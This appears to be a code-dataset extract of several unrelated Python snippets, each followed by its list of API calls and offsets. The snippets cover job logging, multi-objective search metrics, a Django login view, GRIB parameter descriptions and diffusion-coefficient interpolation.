job process, which in turn writes log messages to the job's log file.
"""
@staticmethod
def configure_logger(logger, logging_config):
"""
Configures the specified logger to write log records to this job's
logging queue.
For the `logging_config` argument, the main job process can pass
the `logging_config` attribute of its `JobLoggingManager`. This
information is also passed to the `execute` method of the job's
command as the `logging_config` attribute of the command's
execution context. The information is picklable, so it can be
delivered easily to any additional process started by the main
job process as an argument to the process's target function.
"""
level, queue = logging_config
logger.setLevel(level)
handler = QueueHandler(queue)
logger.addHandler(handler)
def __init__(self, job, level):
self.job = job
self.level = level
# Create queue through which log records can be sent from various
# processes and threads to the logging thread.
self.queue = Queue()
formatter = logging_utils.create_formatter()
# Create handler that writes log messages to the job log file.
os_utils.create_parent_directory(job.log_file_path)
file_handler = FileHandler(job.log_file_path, 'w')
file_handler.setFormatter(formatter)
# We used to create a second handler here, of type StreamHandler,
# which wrote messages to stderr, and add it to the QueueListener
# below, but that is no longer desirable since we now configure
# console output on the root logger in our Django project's
# settings.py file. Adding the second handler here would be
# redundant, causing jobs to output two copies of each log
# message to the console.
self._record_counts_handler = _RecordCountsHandler()
# Create logging listener that will run on its own thread and log
# messages sent to it via the queue.
self._listener = QueueListener(
self.queue, file_handler, self._record_counts_handler)
@property
def logging_config(self):
return (self.level, self.queue)
@property
def record_counts(self):
return dict(self._record_counts_handler.record_counts)
def start_up_logging(self):
self._listener.start()
def shut_down_logging(self):
# Tell logging listener to terminate, and wait for it to do so.
self._listener.stop()
logging.shutdown()
| [
"logging.handlers.QueueHandler",
"vesper.util.logging_utils.create_formatter",
"logging.handlers.QueueListener",
"vesper.util.os_utils.create_parent_directory",
"logging.shutdown",
"collections.defaultdict",
"logging.FileHandler",
"multiprocessing.Queue"
] | [((621, 637), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (632, 637), False, 'from collections import defaultdict\n'), ((2101, 2120), 'logging.handlers.QueueHandler', 'QueueHandler', (['queue'], {}), '(queue)\n', (2113, 2120), False, 'from logging.handlers import QueueHandler, QueueListener\n'), ((2420, 2427), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (2425, 2427), False, 'from multiprocessing import Queue\n'), ((2457, 2489), 'vesper.util.logging_utils.create_formatter', 'logging_utils.create_formatter', ([], {}), '()\n', (2487, 2489), True, 'import vesper.util.logging_utils as logging_utils\n'), ((2578, 2629), 'vesper.util.os_utils.create_parent_directory', 'os_utils.create_parent_directory', (['job.log_file_path'], {}), '(job.log_file_path)\n', (2610, 2629), True, 'import vesper.util.os_utils as os_utils\n'), ((2653, 2688), 'logging.FileHandler', 'FileHandler', (['job.log_file_path', '"""w"""'], {}), "(job.log_file_path, 'w')\n", (2664, 2688), False, 'from logging import FileHandler, Handler\n'), ((3415, 3483), 'logging.handlers.QueueListener', 'QueueListener', (['self.queue', 'file_handler', 'self._record_counts_handler'], {}), '(self.queue, file_handler, self._record_counts_handler)\n', (3428, 3483), False, 'from logging.handlers import QueueHandler, QueueListener\n'), ((3967, 3985), 'logging.shutdown', 'logging.shutdown', ([], {}), '()\n', (3983, 3985), False, 'import logging\n')] |
import math
from typing import List
import numpy as np
from datasets.Dataset import Dataset
from models.Solution import Solution
def calculate_avgValue(population: List[Solution]) -> float:
avgValue = 0
for ind in population:
avgValue += ind.compute_mono_objective_score()
avgValue /= len(population)
return avgValue
def calculate_bestAvgValue(population: List[Solution]) -> float:
bestAvgValue = 0
for ind in population:
if bestAvgValue < ind.compute_mono_objective_score():
bestAvgValue = ind.compute_mono_objective_score()
return bestAvgValue
def calculate_numSolutions(population: List[Solution]) -> int:
return len(set(population))
def calculate_spacing(population: List[Solution]) -> float:
n = len(population)
N = 2
spacing = 0
mean_objectives = []
objective = 0
for j in range(0, len(population)):
objective += population[j].total_cost
objective /= len(population)
mean_objectives.append(objective)
objective = 0
for j in range(0, len(population)):
objective += population[j].total_satisfaction
objective /= len(population)
mean_objectives.append(objective)
for j in range(0, len(population)):
aux_spacing = 0
for i in range(0, N):
di = mean_objectives[i]
if i == 0:
dij = population[j].total_cost
elif i == 1:
dij = population[j].total_satisfaction
aux = (1 - (abs(dij) / di)) ** 2
aux_spacing += aux
aux_spacing = math.sqrt(aux_spacing)
spacing += aux_spacing
spacing /= (n * N)
return spacing
def calculate_hypervolume(population: List[Solution]) -> float:
objectives_diff = []
aux_max_cost, aux_max_sat = population[0].get_max_cost_satisfactions()
aux_min_cost, aux_min_sat = population[0].get_min_cost_satisfactions()
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_cost < aux_min:
aux_min = ind.total_cost
if ind.total_cost > aux_max:
aux_max = ind.total_cost
aux_max_norm = (aux_max-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_min_norm = (aux_min-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_satisfaction < aux_min:
aux_min = ind.total_satisfaction
if ind.total_satisfaction > aux_max:
aux_max = ind.total_satisfaction
aux_max_norm = (aux_max-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_min_norm = (aux_min-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
hypervolume = 1
for i in range(0, len(objectives_diff)):
hypervolume *= objectives_diff[i]
return hypervolume
def eudis2(v1: float, v2: float) -> float:
return math.dist(v1, v2)
# return distance.euclidean(v1, v2)
def calculate_spread(population: List[Solution], dataset: Dataset) -> float:
MIN_OBJ1 = 0
MIN_OBJ2 = 0
MAX_OBJ1 = np.max(dataset.pbis_satisfaction_scaled)
MAX_OBJ2 = np.max(dataset.pbis_cost_scaled)
df = None
dl = None
davg = None
sum_dist = None
N = len(population)
spread = None
first_solution = population[0]
last_solution = population[len(population) - 1]
first_extreme = [MIN_OBJ1, MIN_OBJ2]
last_extreme = [MAX_OBJ1, MAX_OBJ2]
df = eudis2([first_solution.total_satisfaction,
first_solution.total_cost], first_extreme)
dl = eudis2([last_solution.total_satisfaction,
last_solution.total_cost], last_extreme)
davg = 0
dist_count = 0
for i in range(0, len(population)):
for j in range(0, len(population)):
# avoid distance from a point to itself
if i != j:
dist_count += 1
davg += eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[j].total_satisfaction, population[j].total_cost])
davg /= dist_count
# calculate sumatory(i=1->N-1) |di-davg|
sum_dist = 0
for i in range(0, len(population) - 1):
di = eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[i + 1].total_satisfaction, population[i + 1].total_cost])
sum_dist += abs(di - davg)
# spread formula
spread = (df + dl + sum_dist) / (df + dl + (N - 1) * davg)
return spread
def calculate_mean_bits_per_sol(solutions: List[Solution]) -> float:
genes = 0
n_sols = len(solutions)
for sol in solutions:
genes += np.count_nonzero(sol.selected)
return genes/n_sols
| [
"numpy.count_nonzero",
"math.sqrt",
"math.dist",
"numpy.max"
] | [((3003, 3020), 'math.dist', 'math.dist', (['v1', 'v2'], {}), '(v1, v2)\n', (3012, 3020), False, 'import math\n'), ((3190, 3230), 'numpy.max', 'np.max', (['dataset.pbis_satisfaction_scaled'], {}), '(dataset.pbis_satisfaction_scaled)\n', (3196, 3230), True, 'import numpy as np\n'), ((3246, 3278), 'numpy.max', 'np.max', (['dataset.pbis_cost_scaled'], {}), '(dataset.pbis_cost_scaled)\n', (3252, 3278), True, 'import numpy as np\n'), ((1581, 1603), 'math.sqrt', 'math.sqrt', (['aux_spacing'], {}), '(aux_spacing)\n', (1590, 1603), False, 'import math\n'), ((4782, 4812), 'numpy.count_nonzero', 'np.count_nonzero', (['sol.selected'], {}), '(sol.selected)\n', (4798, 4812), True, 'import numpy as np\n')] |
import json
import mtgsdk as mtg
magic_sets = ('grn',)
def main():
for s in magic_sets:
cards = [vars(c) for c in mtg.Card.where(set=s).all()]
with open(f'tests/data/{s}.json', 'w') as f:
json.dump(cards, f, indent=4, sort_keys=True)
if __name__ == '__main__':
main()
| [
"mtgsdk.Card.where",
"json.dump"
] | [((224, 269), 'json.dump', 'json.dump', (['cards', 'f'], {'indent': '(4)', 'sort_keys': '(True)'}), '(cards, f, indent=4, sort_keys=True)\n', (233, 269), False, 'import json\n'), ((130, 151), 'mtgsdk.Card.where', 'mtg.Card.where', ([], {'set': 's'}), '(set=s)\n', (144, 151), True, 'import mtgsdk as mtg\n')] |
# (C) Copyright 2017- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import logging
from metview import dataset
import re
import pandas as pd
import metview as mv
from metview.indexer import GribIndexer
# logging.basicConfig(level=logging.INFO, format="%(levelname)s - %(message)s")
# logging.basicConfig(level=logging.DEBUG, format="%(levelname)s - %(message)s")
LOG = logging.getLogger(__name__)
PANDAS_ORI_OPTIONS = {}
def init_pandas_options():
global PANDAS_ORI_OPTIONS
if len(PANDAS_ORI_OPTIONS) == 0:
opt = {
"display.max_colwidth": 300,
"display.colheader_justify": "center",
"display.max_columns": 100,
"display.max_rows": 500,
"display.width": None,
}
for k, _ in opt.items():
PANDAS_ORI_OPTIONS[k] = pd.get_option(k)
for k, v in opt.items():
pd.set_option(k, v)
def reset_pandas_options():
global PANDAS_ORI_OPTIONS
if len(PANDAS_ORI_OPTIONS) > 0:
for k, v in PANDAS_ORI_OPTIONS.items():
pd.set_option(k, v)
PANDAS_ORI_OPTIONS = {}
class ParamInfo:
SUFFIXES = {
"hPa": "isobaricInhPa",
"hpa": "isobaricInhPa",
"K": "theta",
"ml": "hybrid",
}
LEVEL_TYPES = {"sfc": "surface", "pl": "isobaricInhPa", "ml": "hybrid"}
LEVEL_RE = re.compile(r"(\d+)")
NUM_RE = re.compile(r"[0-9]+")
SURF_RE = re.compile(r"^\d+\w+")
# SURF_NAME_MAPPER = {"t2": "2t", "q2": "2q", "u10": "10u", "v10": "10v"}
KNOWN_SURF_NAMES = ["2t", "2q", "10u", "10v", "msl", "wind10m"]
VECTOR_NAMES = ["wind10m", "wind3d", "wind"] # the longest ones first
def __init__(self, name, meta=None, scalar=None):
self.name = name
self.scalar = scalar if scalar is not None else True
self.meta = {} if meta is None else meta
if len(self.meta) == 0:
self.meta["shortName"] = name
def make_filter(self):
dims = {}
if self.name:
dims["shortName"] = [self.name]
for n in ["level", "typeOfLevel"]:
v = self.meta.get(n, None)
if v is not None:
dims[n] = [v]
return dims
@staticmethod
def build_from_name(full_name, param_level_types=None):
full_name = full_name
name = full_name
level = None
level_type = ""
# the name is a known param name
if param_level_types:
if name in param_level_types:
lev_t = param_level_types.get(name, [])
meta = {}
if len(lev_t) == 1:
meta = {"typeOfLevel": lev_t[0], "level": None}
scalar = not name in ParamInfo.VECTOR_NAMES
return ParamInfo(name, meta=meta, scalar=scalar)
t = full_name
# surface fields
if t in ParamInfo.KNOWN_SURF_NAMES or ParamInfo.SURF_RE.match(t) is not None:
level_type = "surface"
else:
# guess the level type from the suffix
for k, v in ParamInfo.SUFFIXES.items():
if full_name.endswith(k):
level_type = v
t = full_name[: -(len(k))]
break
# recognise vector params
for v in ParamInfo.VECTOR_NAMES:
if t.startswith(v):
name = v
t = t[len(v) :]
break
# determine level value
m = ParamInfo.LEVEL_RE.search(t)
if m and m.groups() and len(m.groups()) == 1:
level = int(m.group(1))
if level_type == "" and level > 10:
level_type = "isobaricInhPa"
if name == full_name:
name = ParamInfo.NUM_RE.sub("", t)
# check param name in the conf
if param_level_types:
if not name in param_level_types:
raise Exception(
f"Param={name} (guessed from name={full_name}) is not found in dataset!"
)
lev_t = param_level_types.get(name, [])
if lev_t:
if not level_type and len(lev_t) == 1:
level_type = lev_t[0]
elif level_type and level_type not in lev_t:
raise Exception(
f"Level type cannot be guessed from param name={full_name}!"
)
if level_type == "":
level = None
scalar = not name in ParamInfo.VECTOR_NAMES
LOG.debug(f"scalar={scalar}")
meta = {"level": level, "typeOfLevel": level_type}
return ParamInfo(name, meta=meta, scalar=scalar)
@staticmethod
def build_from_fieldset(fs):
assert isinstance(fs, mv.Fieldset)
f = fs[0:3] if len(fs) >= 3 else fs
m = ParamInfo._grib_get(f, GribIndexer.DEFAULT_ECC_KEYS)
name = level = lev_type = ""
scalar = True
meta_same = True
for x in m.keys():
if x != "shortName" and m[x].count(m[x][0]) != len(m[x]):
same = False
break
if meta_same:
if len(m["shortName"]) == 3 and m["shortName"] == ["u", "v", "w"]:
name = "wind3d"
scalar = False
elif len(m["shortName"]) >= 2:
if m["shortName"][0:2] == ["u", "v"]:
name = "wind"
scalar = False
elif m["shortName"][0:2] == ["10u", "10v"]:
name = "wind10m"
m["level"][0] = 0
m["typeOfLevel"][0] = "sfc"
scalar = False
if not name:
name = m["shortName"][0]
if name:
return ParamInfo(name, meta={k: v[0] for k, v in m.items()}, scalar=scalar)
else:
return None
def _meta_match(self, meta, key):
local_key = key if key != "levelist" else "level"
if (
key in meta
and meta[key] is not None
and meta[key]
and local_key in self.meta
):
# print(f"local={self.meta[local_key]} other={meta[key]}")
if isinstance(meta[key], list):
return str(self.meta[local_key]) in meta[key]
else:
return meta[key] == str(self.meta[local_key])
else:
return False
def match(self, name, meta):
# print(f"{self}, name={name}, meta={meta}")
r = 0
if self.name == name:
r += 3
for n in ["shortName", "paramId"]:
if self._meta_match(meta, n):
r += 1
# we only check the rest if the param is ok
if r > 0:
if self._meta_match(meta, "typeOfLevel"):
r += 1
if self._meta_match(meta, "levelist"):
r += 1
return r
def update_meta(self, meta):
self.meta = {**meta, **self.meta}
@staticmethod
def _grib_get(f, keys):
md = mv.grib_get(f, keys, "key")
m = {}
for k, v in zip(keys, md):
key_val = k.split(":")[0]
val = v
if k.endswith(":l"):
val = []
for x in v:
try:
val.append(int(x))
except:
val.append(None)
m[key_val] = val
return m
def __str__(self):
return "{}[name={}, scalar={}, meta={}]".format(
self.__class__.__name__, self.name, self.scalar, self.meta
)
class ParamDesc:
def __init__(self, name):
self.db = None
# self.name = name
self.md = {}
self.levels = {}
self._short_name = None
self._param_id = None
self._long_name = None
self._units = None
def load(self, db):
raise NotImplementedError
def _parse(self, md):
if "level" in md and len(md["level"]) > 0:
df = pd.DataFrame(md)
md.pop("typeOfLevel")
md.pop("level")
for md_key in list(md.keys()):
d = df[md_key].unique().tolist()
self.md[md_key] = d
lev_types = df["typeOfLevel"].unique().tolist()
for t in lev_types:
# print(f" t={t}")
self.levels[t] = []
q = f"typeOfLevel == '{t}'"
# print(q)
dft = df.query(q)
if dft is not None:
self.levels[t] = dft["level"].unique().tolist()
@property
def short_name(self):
if self._short_name is None:
self._short_name = ""
if self.md["shortName"]:
self._short_name = self.md["shortName"][0]
return self._short_name
@property
def param_id(self):
if self._param_id is None:
self._param_id = ""
if self.md["paramId"]:
self._param_id = self.md["paramId"][0]
return self._param_id
@property
def long_name(self):
if self._long_name is None:
self._long_name = ""
if self.db is not None:
self._long_name, self._units = self.db.get_longname_and_units(
self.short_name, self.param_id
)
return self._long_name
@property
def units(self):
if self._units is None:
self._units = ""
if self.db:
self._long_name, self._units = self.db.get_longname_and_units(
self.short_name, self.param_id
)
return self._units
@staticmethod
def describe(db, param=None):
in_jupyter = False
labels = {"marsClass": "class", "marsStream": "stream", "marsType": "type"}
try:
import IPython
# test whether we're in the Jupyter environment
if IPython.get_ipython() is not None:
in_jupyter = True
except:
pass
# describe all the params
if param is None:
t = {"parameter": [], "typeOfLevel": [], "level": []}
need_number = False
for k, v in db.param_meta.items():
if not v.md.get("number", None) in [["0"], [None]]:
need_number = True
break
for k, v in db.param_meta.items():
t["parameter"].append(k)
if len(v.levels) > 1:
lev_type = ""
level = ""
cnt = 0
for md_k, md in v.levels.items():
if in_jupyter:
lev_type += md_k + "<br>"
level += str(ParamDesc.format_list(md)) + "<br>"
else:
prefix = " " if cnt > 0 else ""
lev_type += prefix + f"[{cnt+1}]:" + md_k
level += (
prefix + f"[{cnt+1}]:" + str(ParamDesc.format_list(md))
)
cnt += 1
t["typeOfLevel"].append(lev_type)
t["level"].append(level)
else:
for md_k, md in v.levels.items():
t["typeOfLevel"].append(md_k)
t["level"].append(ParamDesc.format_list(md))
for md_k, md in v.md.items():
if md_k != "number" or need_number:
md_k = labels.get(md_k, md_k)
if not md_k in t:
t[md_k] = []
t[md_k].append(ParamDesc.format_list(md))
if in_jupyter:
txt = ParamDesc._make_html_table(t)
from IPython.display import HTML
return HTML(txt)
else:
df = pd.DataFrame.from_dict(t)
df = df.set_index(["parameter"])
init_pandas_options()
print(df)
# specific param
else:
v = None
if isinstance(param, str):
v = db.param_meta.get(param, None)
elif isinstance(param, int):
v = db.param_id_meta(param)
if v is None:
print(f"No shortName/paramId={param} found in data!")
return
# if v is not None:
t = {
"key": ["shortName"],
"val": [v.short_name],
}
if v.long_name != "" or v.units != "":
t["key"].append("name")
t["val"].append(v.long_name)
t["key"].append("paramId")
t["val"].append(v.param_id)
# ParamDesc.format_list(v.md["shortName"], full=True),
if v.long_name != "" or v.units != "":
t["key"].append("units")
t["val"].append(v.units)
add_cnt = len(v.levels) > 1
cnt = 0
for md_k, md in v.levels.items():
t["key"].append("typeOfLevel" + (f"[{cnt+1}]" if add_cnt else ""))
t["val"].append(md_k)
t["key"].append("level" + (f"[{cnt+1}]" if add_cnt else ""))
t["val"].append(ParamDesc.format_list(md, full=True))
cnt += 1
for kk, md_v in v.md.items():
if kk == "number" and md_v == ["0"]:
continue
if not kk in ["shortName", "paramId"]:
t["key"].append(labels.get(kk, kk))
t["val"].append(ParamDesc.format_list(md_v, full=True))
if in_jupyter:
from IPython.display import HTML
txt = ParamDesc._make_html_table(t, header=False)
return HTML(txt)
else:
df = pd.DataFrame.from_dict(t)
df = df.set_index("key")
init_pandas_options()
print(df)
@staticmethod
def _make_html_table(d, header=None):
header = header if header is not None else True
if len(d) > 1:
first_column_name = list(d.keys())[0]
txt = """
<table>
<tr>{}</tr>
{}
</table>""".format(
"" if not header else "".join([f"<th>{k}</th>" for k in d.keys()]),
"".join(
[
"<tr><th style='text-align: right;'>"
+ d[first_column_name][i]
+ "</th>"
+ "".join(
[
f"<td style='text-align: left;'>{ParamDesc.format_list(d[k][i], full=True)}</td>"
for k in list(d.keys())[1:]
]
)
+ "</tr>"
for i in range(len(d[first_column_name]))
]
),
)
return txt
else:
return ""
@staticmethod
def format_list(v, full=None):
if isinstance(v, list):
if full is True:
return ",".join([str(x) for x in v])
else:
if len(v) == 1:
return v[0]
if len(v) > 2:
return ",".join([str(x) for x in [v[0], v[1], "..."]])
else:
return ",".join([str(x) for x in v])
else:
return v
class ParamNameDesc(ParamDesc):
def __init__(self, name):
super().__init__(name)
self._short_name = name
def load(self, db):
md = {
"typeOfLevel": [],
"level": [],
"date": [],
"time": [],
"step": [],
"number": [],
"paramId": [],
"marsClass": [],
"marsStream": [],
"marsType": [],
"experimentVersionNumber": [],
}
self.db = db
self.md = {}
self.levels = {}
# print(f"par={par}")
for b_name, b_df in db.blocks.items():
if b_name == "scalar":
q = f"shortName == '{self.short_name}'"
dft = b_df.query(q)
elif b_name == self.short_name:
dft = b_df
else:
dft = None
if dft is not None:
for k in md.keys():
# print(f"{self.name}/{k}")
md[k].extend(dft[k].tolist())
# print(f" df[{k}]={df[k]}")
# print(df)
self._parse(md)
class ParamIdDesc(ParamDesc):
def __init__(self, param_id):
super().__init__("")
self._param_id = param_id
def load(self, db):
md = {
"shortName": [],
"typeOfLevel": [],
"level": [],
"date": [],
"time": [],
"step": [],
"number": [],
"paramId": [],
"marsClass": [],
"marsStream": [],
"marsType": [],
"experimentVersionNumber": [],
}
self.db = db
self.md = {}
self.levels = {}
# print(f"par={par}")
b_df = db.blocks.get("scalar", None)
if b_df is not None:
q = f"paramId == '{self._param_id}'"
dft = b_df.query(q)
if dft is not None:
for k in md.keys():
md[k].extend(dft[k].tolist())
self._parse(md)
| [
"logging.getLogger",
"IPython.get_ipython",
"re.compile",
"pandas.DataFrame.from_dict",
"pandas.set_option",
"metview.grib_get",
"pandas.DataFrame",
"IPython.display.HTML",
"pandas.get_option"
] | [((686, 713), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (703, 713), False, 'import logging\n'), ((1667, 1687), 're.compile', 're.compile', (['"""(\\\\d+)"""'], {}), "('(\\\\d+)')\n", (1677, 1687), False, 'import re\n'), ((1701, 1721), 're.compile', 're.compile', (['"""[0-9]+"""'], {}), "('[0-9]+')\n", (1711, 1721), False, 'import re\n'), ((1737, 1760), 're.compile', 're.compile', (['"""^\\\\d+\\\\w+"""'], {}), "('^\\\\d+\\\\w+')\n", (1747, 1760), False, 'import re\n'), ((7416, 7443), 'metview.grib_get', 'mv.grib_get', (['f', 'keys', '"""key"""'], {}), "(f, keys, 'key')\n", (7427, 7443), True, 'import metview as mv\n'), ((1134, 1150), 'pandas.get_option', 'pd.get_option', (['k'], {}), '(k)\n', (1147, 1150), True, 'import pandas as pd\n'), ((1196, 1215), 'pandas.set_option', 'pd.set_option', (['k', 'v'], {}), '(k, v)\n', (1209, 1215), True, 'import pandas as pd\n'), ((1372, 1391), 'pandas.set_option', 'pd.set_option', (['k', 'v'], {}), '(k, v)\n', (1385, 1391), True, 'import pandas as pd\n'), ((8402, 8418), 'pandas.DataFrame', 'pd.DataFrame', (['md'], {}), '(md)\n', (8414, 8418), True, 'import pandas as pd\n'), ((10348, 10369), 'IPython.get_ipython', 'IPython.get_ipython', ([], {}), '()\n', (10367, 10369), False, 'import IPython\n'), ((12340, 12349), 'IPython.display.HTML', 'HTML', (['txt'], {}), '(txt)\n', (12344, 12349), False, 'from IPython.display import HTML\n'), ((12389, 12414), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['t'], {}), '(t)\n', (12411, 12414), True, 'import pandas as pd\n'), ((14324, 14333), 'IPython.display.HTML', 'HTML', (['txt'], {}), '(txt)\n', (14328, 14333), False, 'from IPython.display import HTML\n'), ((14373, 14398), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['t'], {}), '(t)\n', (14395, 14398), True, 'import pandas as pd\n')] |
from hashlib import sha256
from django.http import HttpResponse
from django.shortcuts import redirect, render
from .models import Usuarios
def login(request):
if request.session.get('usuario'):
return redirect('/livro/home/')
status = request.GET.get('status')
return render(request, 'login.html', {'status': status})
def cadastro(request):
if request.session.get('usuario'):
return redirect('/livro/home/')
status = request.GET.get('status')
return render(request, 'cadastro.html', {'status': status})
def valida_cadastro(request):
nome = request.POST.get('nome')
senha = request.POST.get('senha')
email = request.POST.get('email')
usuario = Usuarios.objects.filter(email = email)
if len(nome.strip()) == 0 or len(email.strip()) == 0:
return redirect('/auth/cadastro/?status=1')
if len(senha) < 8:
return redirect('/auth/cadastro/?status=2')
if len(usuario) > 0:
return redirect('/auth/cadatro/?status=3')
try:
senha = sha256(senha.encode()).hexdigest()
usuario = Usuarios(
nome=nome,
email=email,
senha=senha,
)
usuario.save()
return redirect('/auth/cadastro/?status=0')
except:
return redirect('/auth/cadastro/?status=4')
def validar_login(request):
email = request.POST.get('email')
senha = request.POST.get('senha')
senha = sha256(senha.encode()).hexdigest()
usuario = Usuarios.objects.filter(email=email).filter(senha=senha)
if len(usuario) == 0:
return redirect('/auth/login/?status=1')
elif len(usuario) > 0:
request.session['usuario'] = usuario[0].id
return redirect(f'/livro/home/')
return HttpResponse(f"{email} {senha}")
def sair(request):
request.session.flush()
return redirect('/auth/login/')
| [
"django.shortcuts.render",
"django.http.HttpResponse",
"django.shortcuts.redirect"
] | [((297, 346), 'django.shortcuts.render', 'render', (['request', '"""login.html"""', "{'status': status}"], {}), "(request, 'login.html', {'status': status})\n", (303, 346), False, 'from django.shortcuts import redirect, render\n'), ((505, 557), 'django.shortcuts.render', 'render', (['request', '"""cadastro.html"""', "{'status': status}"], {}), "(request, 'cadastro.html', {'status': status})\n", (511, 557), False, 'from django.shortcuts import redirect, render\n'), ((1765, 1797), 'django.http.HttpResponse', 'HttpResponse', (['f"""{email} {senha}"""'], {}), "(f'{email} {senha}')\n", (1777, 1797), False, 'from django.http import HttpResponse\n'), ((1858, 1882), 'django.shortcuts.redirect', 'redirect', (['"""/auth/login/"""'], {}), "('/auth/login/')\n", (1866, 1882), False, 'from django.shortcuts import redirect, render\n'), ((217, 241), 'django.shortcuts.redirect', 'redirect', (['"""/livro/home/"""'], {}), "('/livro/home/')\n", (225, 241), False, 'from django.shortcuts import redirect, render\n'), ((425, 449), 'django.shortcuts.redirect', 'redirect', (['"""/livro/home/"""'], {}), "('/livro/home/')\n", (433, 449), False, 'from django.shortcuts import redirect, render\n'), ((830, 866), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=1"""'], {}), "('/auth/cadastro/?status=1')\n", (838, 866), False, 'from django.shortcuts import redirect, render\n'), ((906, 942), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=2"""'], {}), "('/auth/cadastro/?status=2')\n", (914, 942), False, 'from django.shortcuts import redirect, render\n'), ((984, 1019), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadatro/?status=3"""'], {}), "('/auth/cadatro/?status=3')\n", (992, 1019), False, 'from django.shortcuts import redirect, render\n'), ((1231, 1267), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=0"""'], {}), "('/auth/cadastro/?status=0')\n", (1239, 1267), False, 'from django.shortcuts import redirect, render\n'), ((1600, 1633), 'django.shortcuts.redirect', 'redirect', (['"""/auth/login/?status=1"""'], {}), "('/auth/login/?status=1')\n", (1608, 1633), False, 'from django.shortcuts import redirect, render\n'), ((1295, 1331), 'django.shortcuts.redirect', 'redirect', (['"""/auth/cadastro/?status=4"""'], {}), "('/auth/cadastro/?status=4')\n", (1303, 1331), False, 'from django.shortcuts import redirect, render\n'), ((1727, 1752), 'django.shortcuts.redirect', 'redirect', (['f"""/livro/home/"""'], {}), "(f'/livro/home/')\n", (1735, 1752), False, 'from django.shortcuts import redirect, render\n')] |
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
import numpy as np
import os
from nanopores.tools import fields
from scipy.interpolate import interp1d
HOME = os.path.expanduser("~")
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
fields.set_dir(DATADIR)
data = fields.get_fields("pugh_diff3D_cross", bulkbc=True, rMolecule=2.0779)
def smooth3(l):
A=np.array(l)
B=A[:]
ker=np.array([1./3,1./3,1./3])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smooth5(l):
A=np.array(l)
B=A[:]
ker=np.array([.2,.2,.2,.2,.2])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smootha(l):
A=np.array(l)
B=A[:]
ker=np.array([10.,12.,15.,12.,10.])
ker=ker/np.sum(ker)
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
x = [z[0] for z in data["x"]]
data, x = fields._sorted(data, x)
eps=5e-3
x_=x[:]
#x_.extend([1.,1.+eps,1.+2*eps,1.+3*eps])
x.extend([(x[-1]+1.)/2.,1.,1.+eps,1.+2*eps,1.+3*eps,1.+4*eps,1.+5*eps])
dstr = ["x", "y", "z"]
Dxx = [D[0][0] for D in data["D"]]
Dyy = [D[1][1] for D in data["D"]]
Dzz = [D[2][2] for D in data["D"]]
Dxx_ = [D[0][0] for D in data["D"]]
Dyy_ = [D[1][1] for D in data["D"]]
Dzz_ = [D[2][2] for D in data["D"]]
Dxx.extend([0.,0.,0.,0.,0.,0.,0.])
Dyy.extend([Dyy[-1]/2.,0.,0.,0.,0.,0.,0.])
Dzz.extend([Dzz[-1]/2.,0.,0.,0.,0.,0.,0.])
#Dxx_.extend([0.,0.,0.,0.])
#Dyy_.extend([0.,0.,0.,0.])
#Dzz_.extend([0.,0.,0.,0.])
Dxx=smooth5(smooth3(Dxx))
Dyy=smooth5(smooth3(Dyy))
Dzz=smooth5(smooth3(Dzz))
Dx = interp1d(x,Dxx)
Dy = interp1d(x,Dyy)
Dz = interp1d(x,Dzz)
DDxx = [0.]+[(Dxx[i+1]-Dxx[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDyy = [0.]+[(Dyy[i+1]-Dyy[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDzz = [0.]+[(Dzz[i+1]-Dzz[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
dDx = interp1d(x,DDxx)
dDy = interp1d(x,DDyy)
dDz = interp1d(x,DDzz)
if __name__=='__main__':
xc=np.linspace(0.,1.,100)
plt.plot(x_,Dxx_,color='blue',linestyle=':')
plt.scatter(x_,Dxx_,color='blue')
plt.scatter(x,Dxx,color='blue')
#plt.plot(x,Dxx,color='blue')
plt.plot(xc,Dx(xc),color='blue',label=r"$D_{%s%s}$" % (dstr[0], dstr[0]))
plt.scatter(x,DDxx,color='blue')
#plt.plot(x,DDxx,color='blue')
plt.plot(xc,dDx(xc),color='blue')
plt.plot(x_,Dyy_,color='red',linestyle=':')
plt.scatter(x_,Dyy_,color='red')
plt.scatter(x,Dyy,color='red')
#plt.plot(x,Dyy,color='red')
plt.plot(xc,Dy(xc),color='red',label=r"$D_{%s%s}$" % (dstr[1], dstr[1]))
plt.scatter(x,DDyy,color='red')
#plt.plot(x,DDyy,color='red')
plt.plot(xc,dDy(xc),color='red')
plt.plot(x_,Dzz_,color='green',linestyle=':')
plt.scatter(x_,Dzz_,color='green')
